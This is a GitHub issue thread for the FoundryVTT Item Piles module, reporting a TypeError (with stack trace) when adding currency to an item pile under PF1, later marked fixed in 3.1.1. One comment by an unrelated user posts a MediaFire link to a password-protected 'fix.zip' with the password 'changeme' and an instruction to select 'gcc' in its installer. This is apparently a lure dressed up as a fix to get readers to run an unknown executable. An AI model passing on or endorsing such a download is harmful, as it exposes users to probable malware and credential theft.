### ISSUE TITLE
[BUG] PF1 - Adding currency to item pile causes an error instead

### ISSUE THREAD

**Issue by mkahvi** [fantasycalendar/FoundryVTT-ItemPiles#642]
**Are you on the latest version of Item Piles?**
Yes (specifically latest master branch version e075933031c6a8473f6083f1ca0c8ab3c1337d24)

**Have you tried to reset Item Piles' system settings?**
Yes (fresh install, rather)

**Describe the bug**
Adding currency to item pile causes an error instead.

**To Reproduce**

1. Place unlinked actor on scene
2. Convert to item pile
3. Add currency
4. Attempt to add any currency

**Expected behavior**
Currency added

**Screenshots**

```
private-api.js:730 Uncaught (in promise) TypeError: undefined. (void 0) is not a function
[Detected 2 packages: item-piles, socketlib]
    at PrivateAPI._setAttributes (private-api.js:730:26)
    at Object.setAttributes (socket.js:118:59)
    at SocketlibSocket._executeLocal (socketlib.js:192:15)
    at SocketlibSocket.executeAsGM (socketlib.js:90:16)
    at socket.js:187:71
    at Object.timedSocketRequest (socket.js:234:38)
    at ItemPileSocket.executeAsGM (socket.js:187:19)
    at API.setAttributes (api.js:1609:25)
    at ItemPileStore._addCurrency (item-pile-store.js:530:30)
    at ItemPileStore.addCurrency (item-pile-store.js:518:15)
```

**Setup:**
- Foundry Version: 11.315
- System Version: PF1 10.7
- Item Piles Version: latest master
- Browser & version Electron

**Active modules:**
- Item Piles
- libwrapper
- socketlib

**Additional context**

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Haxxer** [comment]
Fixed in 3.1.1
